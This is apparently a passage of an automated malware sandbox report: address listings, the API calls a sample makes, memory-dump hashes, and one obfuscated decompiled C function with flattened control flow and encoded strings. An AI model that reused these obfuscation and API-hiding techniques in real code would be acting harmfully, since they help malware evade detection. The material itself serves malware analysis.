                                                                                                                                                        0x00b80636
                                                                                                                                                        0x00b80a60
                                                                                                                                                        0x00b80a65
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80a65
                                                                                                                                                        0x00b8063c
                                                                                                                                                        0x00b8063e
                                                                                                                                                        0x00b80644
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8064e
                                                                                                                                                        0x00b809f9
                                                                                                                                                        0x00b809fe
                                                                                                                                                        0x00b8047f
                                                                                                                                                        0x00b8047f
                                                                                                                                                        0x00b80482
                                                                                                                                                        0x00b80488
                                                                                                                                                        0x00b8048e
                                                                                                                                                        0x00b80494
                                                                                                                                                        0x00b80924
                                                                                                                                                        0x00b80927
                                                                                                                                                        0x00b8049a
                                                                                                                                                        0x00b8049a
                                                                                                                                                        0x00b8049c
                                                                                                                                                        0x00b804a2
                                                                                                                                                        0x00b804a8
                                                                                                                                                        0x00b804a8
                                                                                                                                                        0x00b804a2
                                                                                                                                                        0x00b80494
                                                                                                                                                        0x00b80488
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80479
                                                                                                                                                        0x00b8033f
                                                                                                                                                        0x00b805ad
                                                                                                                                                        0x00b805b3
                                                                                                                                                        0x00b809f6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b809f6
                                                                                                                                                        0x00b805b9
                                                                                                                                                        0x00b805bf
                                                                                                                                                        0x00b80a0a
                                                                                                                                                        0x00b80a17
                                                                                                                                                        0x00b805c5
                                                                                                                                                        0x00b805c5
                                                                                                                                                        0x00b805c7
                                                                                                                                                        0x00b805cd
                                                                                                                                                        0x00b805d3
                                                                                                                                                        0x00b805da
                                                                                                                                                        0x00b805de
                                                                                                                                                        0x00b805de
                                                                                                                                                        0x00b805cd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b805bf
                                                                                                                                                        0x00b8034b
                                                                                                                                                        0x00b80788
                                                                                                                                                        0x00b8078e
                                                                                                                                                        0x00b80bd5
                                                                                                                                                        0x00b80bd7
                                                                                                                                                        0x00b80bdd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80c30
                                                                                                                                                        0x00b80c37
                                                                                                                                                        0x00b80c3c
                                                                                                                                                        0x00b80c3e
                                                                                                                                                        0x00b80c3e
                                                                                                                                                        0x00b8079b
                                                                                                                                                        0x00b807a0
                                                                                                                                                        0x00b807a8
                                                                                                                                                        0x00b807b4
                                                                                                                                                        0x00b807b9
                                                                                                                                                        0x00b807bf
                                                                                                                                                        0x00b807c5
                                                                                                                                                        0x00b807ca
                                                                                                                                                        0x00b807d0
                                                                                                                                                        0x00b807d7
                                                                                                                                                        0x00b807da
                                                                                                                                                        0x00b807df
                                                                                                                                                        0x00b807e1
                                                                                                                                                        0x00b807e6
                                                                                                                                                        0x00b807f7
                                                                                                                                                        0x00b80351
                                                                                                                                                        0x00b80357
                                                                                                                                                        0x00b807ff
                                                                                                                                                        0x00b80804
                                                                                                                                                        0x00b8035d
                                                                                                                                                        0x00b8035d
                                                                                                                                                        0x00b80365
                                                                                                                                                        0x00b80378
                                                                                                                                                        0x00b80378
                                                                                                                                                        0x00b80365
                                                                                                                                                        0x00b80357
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8037d
                                                                                                                                                        0x00b8037d
                                                                                                                                                        0x00b80383
                                                                                                                                                        0x00b80415
                                                                                                                                                        0x00b8041b
                                                                                                                                                        0x00b8054c
                                                                                                                                                        0x00b80552
                                                                                                                                                        0x00b8074b
                                                                                                                                                        0x00b80751
                                                                                                                                                        0x00b80ba2
                                                                                                                                                        0x00b80baf
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80baf
                                                                                                                                                        0x00b80757
                                                                                                                                                        0x00b8075d
                                                                                                                                                        0x00b80bb7
                                                                                                                                                        0x00b80bc1
                                                                                                                                                        0x00b80bc3
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80bc3
                                                                                                                                                        0x00b80763
                                                                                                                                                        0x00b80765
                                                                                                                                                        0x00b8076b
                                                                                                                                                        0x00b80771
                                                                                                                                                        0x00b80780
                                                                                                                                                        0x00b80780
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8076b
                                                                                                                                                        0x00b80558
                                                                                                                                                        0x00b8055e
                                                                                                                                                        0x00b80967
                                                                                                                                                        0x00b8096e
                                                                                                                                                        0x00b80974
                                                                                                                                                        0x00b8097a
                                                                                                                                                        0x00b80984
                                                                                                                                                        0x00b80984
                                                                                                                                                        0x00b80564
                                                                                                                                                        0x00b8056a
                                                                                                                                                        0x00b80997
                                                                                                                                                        0x00b8099d
                                                                                                                                                        0x00b809a3
                                                                                                                                                        0x00b809ae
                                                                                                                                                        0x00b809b5
                                                                                                                                                        0x00b809ba
                                                                                                                                                        0x00b809c9
                                                                                                                                                        0x00b809d6
                                                                                                                                                        0x00b809de
                                                                                                                                                        0x00b809ea
                                                                                                                                                        0x00b80570
                                                                                                                                                        0x00b80570
                                                                                                                                                        0x00b80572
                                                                                                                                                        0x00b80578
                                                                                                                                                        0x00b8058b
                                                                                                                                                        0x00b8059f
                                                                                                                                                        0x00b805a3
                                                                                                                                                        0x00b805a3
                                                                                                                                                        0x00b80578
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8056a
                                                                                                                                                        0x00b80421
                                                                                                                                                        0x00b80427
                                                                                                                                                        0x00b806cc
                                                                                                                                                        0x00b806d2
                                                                                                                                                        0x00b80c0b
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b80313
                                                                                                                                                        0x00b806d8
                                                                                                                                                        0x00b806de
                                                                                                                                                        0x00b80b56
                                                                                                                                                        0x00b80b5b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80b5b
                                                                                                                                                        0x00b806e4
                                                                                                                                                        0x00b806e6
                                                                                                                                                        0x00b806ec
                                                                                                                                                        0x00b806f2
                                                                                                                                                        0x00b80701
                                                                                                                                                        0x00b80701
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b806ec
                                                                                                                                                        0x00b8042d
                                                                                                                                                        0x00b80433
                                                                                                                                                        0x00b808e4
                                                                                                                                                        0x00b808e9
                                                                                                                                                        0x00b808ee
                                                                                                                                                        0x00b808f3
                                                                                                                                                        0x00b808f8
                                                                                                                                                        0x00b8090a
                                                                                                                                                        0x00b8090f
                                                                                                                                                        0x00b80916
                                                                                                                                                        0x00b8091a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8091a
                                                                                                                                                        0x00b80439
                                                                                                                                                        0x00b8043f
                                                                                                                                                        0x00b80be5
                                                                                                                                                        0x00b80bed
                                                                                                                                                        0x00b80bf4
                                                                                                                                                        0x00b80c01
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80445
                                                                                                                                                        0x00b80445
                                                                                                                                                        0x00b80447
                                                                                                                                                        0x00b8044d
                                                                                                                                                        0x00b80453
                                                                                                                                                        0x00b8045c
                                                                                                                                                        0x00b8046b
                                                                                                                                                        0x00b8046b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8044d
                                                                                                                                                        0x00b8043f
                                                                                                                                                        0x00b80389
                                                                                                                                                        0x00b8038f
                                                                                                                                                        0x00b804f6
                                                                                                                                                        0x00b804fc
                                                                                                                                                        0x00b80709
                                                                                                                                                        0x00b8070f
                                                                                                                                                        0x00b80b6e
                                                                                                                                                        0x00b80b7b
                                                                                                                                                        0x00b80715
                                                                                                                                                        0x00b80715
                                                                                                                                                        0x00b8071b
                                                                                                                                                        0x00b80b88
                                                                                                                                                        0x00b80b8d
                                                                                                                                                        0x00b80b92
                                                                                                                                                        0x00b80b97
                                                                                                                                                        0x00b80721
                                                                                                                                                        0x00b80721
                                                                                                                                                        0x00b80723
                                                                                                                                                        0x00b80729
                                                                                                                                                        0x00b8072f
                                                                                                                                                        0x00b80732
                                                                                                                                                        0x00b80737
                                                                                                                                                        0x00b8073c
                                                                                                                                                        0x00b80741
                                                                                                                                                        0x00b80741
                                                                                                                                                        0x00b80729
                                                                                                                                                        0x00b8071b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8070f
                                                                                                                                                        0x00b80502
                                                                                                                                                        0x00b80508
                                                                                                                                                        0x00b80944
                                                                                                                                                        0x00b80951
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80951
                                                                                                                                                        0x00b8050e
                                                                                                                                                        0x00b80514
                                                                                                                                                        0x00b80959
                                                                                                                                                        0x00b8095e
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8095e
                                                                                                                                                        0x00b8051a
                                                                                                                                                        0x00b8051c
                                                                                                                                                        0x00b80522
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80528
                                                                                                                                                        0x00b8052a
                                                                                                                                                        0x00b8052f
                                                                                                                                                        0x00b80535
                                                                                                                                                        0x00b8053b
                                                                                                                                                        0x00b80545
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b80545
                                                                                                                                                        0x00b80395
                                                                                                                                                        0x00b80395
                                                                                                                                                        0x00b8039b
                                                                                                                                                        0x00b8068d
                                                                                                                                                        0x00b80693
                                                                                                                                                        0x00b80b3b
                                                                                                                                                        0x00b80b40
                                                                                                                                                        0x00b80699
                                                                                                                                                        0x00b80699
                                                                                                                                                        0x00b8069f
                                                                                                                                                        0x00b80b4d
                                                                                                                                                        0x00b80b4f
                                                                                                                                                        0x00b806a5
                                                                                                                                                        0x00b806a5
                                                                                                                                                        0x00b806a7
                                                                                                                                                        0x00b806ad
                                                                                                                                                        0x00b806b7
                                                                                                                                                        0x00b806c4
                                                                                                                                                        0x00b806c4
                                                                                                                                                        0x00b806ad
                                                                                                                                                        0x00b8069f
                                                                                                                                                        0x00b803a1
                                                                                                                                                        0x00b803a1
                                                                                                                                                        0x00b803a7
                                                                                                                                                        0x00b80815
                                                                                                                                                        0x00b80822
                                                                                                                                                        0x00b803ad
                                                                                                                                                        0x00b803ad
                                                                                                                                                        0x00b803b3
                                                                                                                                                        0x00b8082e
                                                                                                                                                        0x00b8083b
                                                                                                                                                        0x00b803b9
                                                                                                                                                        0x00b803b9
                                                                                                                                                        0x00b803bb
                                                                                                                                                        0x00b803c1
                                                                                                                                                        0x00b803c7
                                                                                                                                                        0x00b803c9
                                                                                                                                                        0x00b803c9
                                                                                                                                                        0x00b803c1
                                                                                                                                                        0x00b803b3
                                                                                                                                                        0x00b803a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b8039b
                                                                                                                                                        0x00b8038f
                                                                                                                                                        0x00b80318

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00B7CDB9: RtlAllocateHeap.NTDLL(?,9FD7756B,079849AE,0701B759,?,00B80A77), ref: 00B7CE20
                                                                                                                                                        • ExitProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 00B80984
                                                                                                                                                        • SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,FD91BC21), ref: 00B809AE
                                                                                                                                                          • Part of subcall function 00B73A22: CreateMutexExA.KERNEL32(?,?,?,079849AE,0701B759,00B809DE), ref: 00B73A4E
                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00B80C3E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.482142058.0000000000B71000.00000020.00000001.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.482132217.0000000000B70000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482167503.0000000000B84000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.482175737.0000000000B87000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess$AllocateCreateHeapMutexSleep
                                                                                                                                                        • String ID: 0u$?VN$?VN$c/9$c/9$Ug$Ug
                                                                                                                                                        • API String ID: 2152516511-3375559661
                                                                                                                                                        • Opcode ID: 408de1cb32e6a23b8f6d86f31cac7ebb337cbef467db620d4c6511f590c7df8b
                                                                                                                                                        • Instruction ID: 02e0819858a62edecc0d8ab2f834e35152cd2ea0e5b9df953b25e5e9f3330a4f
                                                                                                                                                        • Opcode Fuzzy Hash: 408de1cb32e6a23b8f6d86f31cac7ebb337cbef467db620d4c6511f590c7df8b
                                                                                                                                                        • Instruction Fuzzy Hash: 1012C4717283458BCBECBB1894A063E66D1EB88784F60415AF65BCBB74DA28CC44DB49
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00B74554, Relevance: 7.5, APIs: 3, Strings: 1, Instructions: 505processCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 66%
                                                                                                                                                        			E00B74554(long long __rax, void* __rcx, void* __r11) {
				long long _v72;
				signed long long _v80;
				signed long long _v88;
				signed long long _v96;
				void* _v104;
				intOrPtr _v108;
				signed long long _v120;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				void* _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				char _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				void* _v176;
				void* _v184;
				long long _v192;
				void* _v200;
				void* _v208;
				signed int _v212;
				intOrPtr _v216;
				long long _v224;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				void* _v248;
				intOrPtr _v252;
				void* _v264;
				signed int _v268;
				void* _t155;
				void* _t167;
				void* _t179;
				intOrPtr _t207;
				void* _t215;
				intOrPtr _t277;
				void* _t278;
				long long _t302;
				signed long long _t307;
				signed long long _t315;
				void* _t327;
				signed long long _t341;
				void* _t342;
				signed long long _t346;
				void* _t350;
				void* _t351;
				signed long long _t353;
				signed long long _t354;

				_t302 = __rax;
				_t350 =  &_v248;
				_t342 = __rcx;
				E00B7CDB9(0x64, __rax);
				_v264 = _t302;
				r14d = 0;
				r8d = 0x64;
				E00B7C8BC(0, _t302, _v264, _t351, __r11);
				_v104 = _t342 + 0xadc;
				_t341 = _v104;
				r8d = 0x328b7e5;
				r9d = 0x57;
				E00B7FAD7(1, _t278, _t302, _v264);
				_t327 = _t341;
				r8d = 0x64;
				 *_t302();
				_v72 = _t302;
				r13d = 4;
				_t346 =  &_v248 | _t353;
				_v80 =  &_v144 | _t353;
				_v88 =  &_v176 | _t353;
				_t307 =  &_v160;
				_t354 = _t353 | _t307;
				_t155 = 0xbd3af00e;
				L1:
				while(1) {
					L1:
					while(1) {
						while(_t155 > 0x156d8657) {
							if(_t155 <= 0x47698b65) {
								if(_t155 <= 0x26d898f6) {
									if(_t155 == 0x156d8658) {
										_t167 = 0x3661a3a2;
										L88:
										_t155 =  ==  ? 0xc2dc12f5 : _t167;
										continue;
									}
									if(_t155 == 0x17687833) {
										L61:
										_t307 = _v200;
										_t155 = 0xaac379a3;
										continue;
									}
									if(_t155 != 0x256502ce) {
										continue;
									}
									_v248 = r14b;
									_v244 = 0x69babbe9;
									_v240 = 0x3790a6e1;
									_v236 = 0x1992b0c1;
									if(_v248 != r14b) {
										L41:
										_t327 = _v224;
										r8d = 0xb;
										E00B7CA65(_t327, _t346, _t351);
										_t155 =  ==  ? 0x57f7ec6f : 0x79c90ec8;
										r12d = _v108;
										continue;
									}
									do {
										 *(_t350 + 0x40 + _t307 * 4) =  *(_t350 + 0x40 + _t307 * 4) & 0xe608375b |  !( *(_t350 + 0x40 + _t307 * 4)) & 0x19f7c8a4;
										_t327 = _t327 + 1;
										_t307 = _t307 + 1;
									} while (_t307 != 4);
									goto L41;
								}
								if(_t155 > 0x3661a3a1) {
									if(_t155 == 0x3661a3a2) {
										_t167 = 0x7953da70;
										goto L88;
									}
									if(_t155 == 0x4459eabe) {
										r14d = _t207;
										r8d = 0x2db58ff7;
										r9d = 0x11;
										E00B7FAD7(1, _t278, _t307, _t327);
										FindCloseChangeNotification(??); // executed
										E00B7CC2E(_t307, _v96);
										 *_v264 = 0x56;
										 *((char*)(_v264 + 1)) = _t341 + 0x41;
										_t307 = _v264;
										 *((char*)(_t307 + 2)) = 0;
										r8d = 0x7328b7e5;
										r9d = 0x59;
										E00B7FAD7(1, _t278, _t307, _v264);
										_t327 = _v104;
										_t207 = r14d;
										r14d = 0;
										 *_t307();
										_t155 = 0x47698b66;
										_v216 = _t277;
									}
									continue;
								}
								if(_t155 == 0x26d898f7) {
									_v176 = r14b;
									_v172 = 0x1883419a;
									_v168 = 0x45ab62af;
									_v164 = 0x6b874fbe;
									if(_v176 != r14b) {
										L71:
										_t327 = _v224;
										r8d = 0xb;
										E00B7CA65(_t327, _v88, _t351);
										_t155 =  ==  ? 0xf699f5c5 : 0x82cc269e;
										continue;
									}
									do {
										 *(_t350 + 0x88 + _t307 * 4) = ( *(_t350 + 0x88 + _t307 * 4) & 0xb7e568a1 |  !( *(_t350 + 0x88 + _t307 * 4)) & 0x481a975e) ^ 0x23f8a085;
										_t327 = _t327 + 1;
										_t307 = _t307 + 1;
									} while (_t307 != 4);
									goto L71;
								} else {
									if(_t155 == 0x2d4edb4e) {
										_t155 =  ==  ? 0xc2dc12f5 : 0xedb8c621;
										_v212 = 0;
									}
									continue;
								}
							}
							if(_t155 <= 0x6b450fde) {
								if(_t155 <= 0x4a7d68ff) {
									if(_t155 == 0x498446a6) {
										r8d = 0x86fb7f30;
										r9d = 0x60;
										E00B7FAD7(1, _t278, _t307, _t327);
										_t327 = _v120;
										 *_t307();
										_t155 =  ==  ? 0x4459eabe : 0x90bf802d;
										_t207 = _v252;
										_t277 = _v252;
										continue;
									}
									if(_t155 != 0x47698b66) {
										continue;
									}
									return _v216;
								} else {
									if(_t155 == 0x4a7d6900) {
										_t155 =  ==  ? 0xc3b70504 : 0x47698b66;
										_v216 = r15d;
									} else {
										if(_t155 == 0x57f7ec6f) {
											_t155 = 0x79c90ec8;
											r12d = 0x10;
										}
									}
									continue;
								}
							}
							if(_t155 > 0x7953da6f) {
								if(_t155 == 0x7953da70) {
									_t167 = 0x2d4edb4e;
									goto L88;
								}
								if(_t155 == 0x79c90ec8) {
									_v252 = r12d;
									_t155 =  ==  ? 0x498446a6 : 0x4459eabe;
									_t277 = _v252;
								}
								continue;
							}
							if(_t155 == 0x6b450fdf) {
								_t307 = _v264;
								_t179 = 0x4a7d6900;
								_t215 = 0x42fedaa;
								L63:
								_t155 =  ==  ? _t215 : _t179;
								r15d = 0;
								continue;
							}
							if(_t155 != 0x74143c86) {
								continue;
							}
							_v248 = r14b;
							_v244 = 0x76969af2;
							_v240 = 0x52bdad8b;
							_v236 = 0x37c5c8a5;
							if(_v248 != r14b) {
								L10:
								_t327 = _v224;
								r8d = 8;
								E00B7CA65(_t327, _t346, _t351);
								_t155 =  ==  ? 0x84ce7a97 : 0x256502ce;
								continue;
							} else {
								do {
									 *(_t350 + 0x40 + _t307 * 4) =  *(_t350 + 0x40 + _t307 * 4) & 0xc83a375a |  !( *(_t350 + 0x40 + _t307 * 4)) & 0x37c5c8a5;
									_t327 = _t327 + 1;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L10;
							}
						}
						if(_t155 > 0xbd3af00d) {
							if(_t155 <= 0xd01fc255) {
								if(_t155 == 0xbd3af00e) {
									_t155 =  ==  ? 0x8161912a : 0x9e0aa110;
								} else {
									if(_t155 == 0xc2dc12f5) {
										_t155 = 0xedb8c621;
										_v212 = _v268;
									} else {
										if(_t155 == 0xc3b70504) {
											E00B7CDB9(0x130, _t307);
											_v96 = _t307;
											_v208 = _v96;
											_t307 = _v208;
											 *_t307 = 0x130;
											_t277 = 1;
											r8d = 0x29f7579a;
											r9d = 0x61;
											E00B7FAD7(1, _t278, _t307, _t327);
											 *_t307(); // executed
											_v120 = _t307;
											r8d = 0xfd3d1fba;
											r9d = 0x5f;
											E00B7FAD7(1, _t278, _t307, _t327);
											_t327 = _v120;
											 *_t307(); // executed
											_t155 =  ==  ? 0x4459eabe : 0x90bf802d;
											_t207 = 1;
										}
									}
								}
								continue;
							}
							if(_t155 > 0xf699f5c4) {
								if(_t155 == 0xf699f5c5) {
									goto L61;
								}
								if(_t155 != 0x42fedaa) {
									continue;
								}
								_t307 = _v264;
								_v268 =  *(_t307 + 1) + 0x000000bf & 0x000000ff;
								_t167 = 0x156d8658;
								goto L88;
							}
							if(_t155 == 0xd01fc256) {
								_v248 = r14b;
								_v244 = 0x47e317b0;
								_v240 = 0x45c33cb0;
								_v236 = 0x54c811fd;
								_v232 = 0x31b074d3;
								if(_v248 != r14b) {
									L75:
									_t327 = _v224;
									r8d = 0xc;
									E00B7CA65(_t327, _t346, _t351);
									_t155 =  ==  ? 0xa0db398f : 0x74143c86;
									continue;
								}
								do {
									 *(_t350 + 0x44 + _t307 * 4) = ( *(_t350 + 0x44 + _t307 * 4) & 0xb5f129fc |  !( *(_t350 + 0x44 + _t307 * 4)) & 0x4a0ed603) ^ 0x7bbea2d0;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L75;
							} else {
								if(_t155 == 0xedb8c621) {
									_t155 = 0x4a7d6900;
									r15d = _v212;
								}
								continue;
							}
						}
						if(_t155 <= 0x90bf802c) {
							if(_t155 == 0x8161912a) {
								r15d = 0;
								r8d = 0xce1f1c4e;
								r9d = 0xc5;
								E00B7FAD7(1, _t278, _t307, _t327);
								 *_t307();
								_t155 = 0x4a7d6900;
								continue;
							}
							if(_t155 == 0x82cc269e) {
								_v144 = r14b;
								_v140 = 0x23a07c9f;
								_v136 = 0x33b759aa;
								_v132 = 0x35b96ff0;
								_v128 = 0x50c10ade;
								if(_v144 != r14b) {
									L81:
									_t327 = _v224;
									r8d = 0xc;
									E00B7CA65(_t327, _v80, _t351);
									_t307 = _v200;
									_t155 =  ==  ? 0xaac379a3 : 0xd01fc256;
									continue;
								}
								do {
									 *(_t350 + 0xac + _t307 * 4) = ( *(_t350 + 0xac + _t307 * 4) & 0x5681c0fd |  !( *(_t350 + 0xac + _t307 * 4)) & 0xa97e3f02) ^ 0xf9bf35dc;
									_t307 = _t307 + 1;
								} while (_t307 != 4);
								goto L81;
							}
							if(_t155 == 0x84ce7a97) {
								_t155 = 0x79c90ec8;
								r12d = 8;
							}
							continue;
						}
						if(_t155 > 0xa0db398e) {
							if(_t155 == 0xa0db398f) {
								_t155 = 0x79c90ec8;
								r12d = 4;
							} else {
								if(_t155 == 0xaac379a3) {
									_t155 = 0x79c90ec8;
									r12d = 2;
								}
							}
							continue;
						}
						if(_t155 == 0x90bf802d) {
							_v108 = _t207;
							_v200 =  &_v160;
							_t315 = _v200;
							_v160 = r14b;
							_v156 = 0x333f36d7;
							_v152 = 0x383b6ee2;
							_v148 = 0x405e40f3;
							if(_v160 != r14b) {
								L67:
								_v224 = _v208 + 0x2c;
								_t327 = _v224;
								r8d = 9;
								E00B7CA65(_t327, _t354, _t351);
								_v192 =  &_v176;
								_v184 =  &_v144;
								_t307 = _v184;
								_t155 =  ==  ? 0x17687833 : 0x26d898f7;
								continue;
							}
							do {
								 *(_t350 + 0x98 + _t315 * 4) = ( *(_t350 + 0x98 + _t315 * 4) & 0x1233963d |  !( *(_t350 + 0x98 + _t315 * 4)) & 0xedcc69c2) ^ 0xad922954;
								_t327 = _t327 + 1;
								_t315 = _t315 + 1;
							} while (_t315 != 4);
							goto L67;
						}
						if(_t155 != 0x9e0aa110) {
							continue;
						} else {
							_t307 = _v264;
							_t179 = 0x4a7d6900;
							_t215 = 0x6b450fdf;
							goto L63;
						}
					}
				}
			}
























































                                                                                                                                                        0x00b74554
                                                                                                                                                        0x00b74560
                                                                                                                                                        0x00b74567
                                                                                                                                                        0x00b7456f
                                                                                                                                                        0x00b74574
                                                                                                                                                        0x00b7457e
                                                                                                                                                        0x00b74581
                                                                                                                                                        0x00b74589
                                                                                                                                                        0x00b74595
                                                                                                                                                        0x00b745a2
                                                                                                                                                        0x00b745b1
                                                                                                                                                        0x00b745b7
                                                                                                                                                        0x00b745bd
                                                                                                                                                        0x00b745c2
                                                                                                                                                        0x00b745c8
                                                                                                                                                        0x00b745ce
                                                                                                                                                        0x00b745d0
                                                                                                                                                        0x00b745d8
                                                                                                                                                        0x00b745e3
                                                                                                                                                        0x00b745f1
                                                                                                                                                        0x00b74604
                                                                                                                                                        0x00b7460c
                                                                                                                                                        0x00b74614
                                                                                                                                                        0x00b74617
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7461c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7461c
                                                                                                                                                        0x00b7461c
                                                                                                                                                        0x00b7462c
                                                                                                                                                        0x00b74726
                                                                                                                                                        0x00b74812
                                                                                                                                                        0x00b74df0
                                                                                                                                                        0x00b74e4e
                                                                                                                                                        0x00b74e53
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74e53
                                                                                                                                                        0x00b7481d
                                                                                                                                                        0x00b74ac5
                                                                                                                                                        0x00b74ad2
                                                                                                                                                        0x00b74ad7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74ad7
                                                                                                                                                        0x00b74828
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7482e
                                                                                                                                                        0x00b74833
                                                                                                                                                        0x00b7483b
                                                                                                                                                        0x00b74843
                                                                                                                                                        0x00b74850
                                                                                                                                                        0x00b7487f
                                                                                                                                                        0x00b7487f
                                                                                                                                                        0x00b74884
                                                                                                                                                        0x00b7488d
                                                                                                                                                        0x00b7489e
                                                                                                                                                        0x00b748a1
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b748a1
                                                                                                                                                        0x00b74859
                                                                                                                                                        0x00b7486f
                                                                                                                                                        0x00b74873
                                                                                                                                                        0x00b74876
                                                                                                                                                        0x00b74879
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74859
                                                                                                                                                        0x00b74731
                                                                                                                                                        0x00b749d1
                                                                                                                                                        0x00b74e49
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74e49
                                                                                                                                                        0x00b749dc
                                                                                                                                                        0x00b749e2
                                                                                                                                                        0x00b749f4
                                                                                                                                                        0x00b749fa
                                                                                                                                                        0x00b74a00
                                                                                                                                                        0x00b74a08
                                                                                                                                                        0x00b74a12
                                                                                                                                                        0x00b74a1c
                                                                                                                                                        0x00b74a27
                                                                                                                                                        0x00b74a2a
                                                                                                                                                        0x00b74a2f
                                                                                                                                                        0x00b74a47
                                                                                                                                                        0x00b74a4d
                                                                                                                                                        0x00b74a53
                                                                                                                                                        0x00b74a58
                                                                                                                                                        0x00b74a5e
                                                                                                                                                        0x00b74a61
                                                                                                                                                        0x00b74a64
                                                                                                                                                        0x00b74a66
                                                                                                                                                        0x00b74a6d
                                                                                                                                                        0x00b74a6d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b749dc
                                                                                                                                                        0x00b7473c
                                                                                                                                                        0x00b74be2
                                                                                                                                                        0x00b74bea
                                                                                                                                                        0x00b74bf5
                                                                                                                                                        0x00b74c00
                                                                                                                                                        0x00b74c13
                                                                                                                                                        0x00b74c4e
                                                                                                                                                        0x00b74c4e
                                                                                                                                                        0x00b74c53
                                                                                                                                                        0x00b74c61
                                                                                                                                                        0x00b74c72
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74c72
                                                                                                                                                        0x00b74c1c
                                                                                                                                                        0x00b74c3b
                                                                                                                                                        0x00b74c42
                                                                                                                                                        0x00b74c45
                                                                                                                                                        0x00b74c48
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74742
                                                                                                                                                        0x00b74747
                                                                                                                                                        0x00b7475e
                                                                                                                                                        0x00b74761
                                                                                                                                                        0x00b74761
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74747
                                                                                                                                                        0x00b7473c
                                                                                                                                                        0x00b74637
                                                                                                                                                        0x00b747b0
                                                                                                                                                        0x00b74aaf
                                                                                                                                                        0x00b74e6f
                                                                                                                                                        0x00b74e75
                                                                                                                                                        0x00b74e7b
                                                                                                                                                        0x00b74e80
                                                                                                                                                        0x00b74e86
                                                                                                                                                        0x00b74e95
                                                                                                                                                        0x00b74e98
                                                                                                                                                        0x00b74e9c
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74e9c
                                                                                                                                                        0x00b74aba
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74ebc
                                                                                                                                                        0x00b747b6
                                                                                                                                                        0x00b747bb
                                                                                                                                                        0x00b74d05
                                                                                                                                                        0x00b74d0b
                                                                                                                                                        0x00b747c1
                                                                                                                                                        0x00b747c6
                                                                                                                                                        0x00b747cc
                                                                                                                                                        0x00b747d1
                                                                                                                                                        0x00b747d1
                                                                                                                                                        0x00b747c6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b747bb
                                                                                                                                                        0x00b747b0
                                                                                                                                                        0x00b74642
                                                                                                                                                        0x00b74973
                                                                                                                                                        0x00b74e2b
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b74e2b
                                                                                                                                                        0x00b7497e
                                                                                                                                                        0x00b74984
                                                                                                                                                        0x00b7499a
                                                                                                                                                        0x00b7499d
                                                                                                                                                        0x00b7499d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00b7497e
                                                                                                                                                        0x00b7464d
                                                                                                                                                        0x00b74ae1
                                                                                                                                                        0x00b74ae9
                                                                                                                                                        0x00b74aee
                                                                                                                                                        0x00b74af3
                                                                                                                                                        0x00b74af3
                                                                                                                                                        0x00b74af6
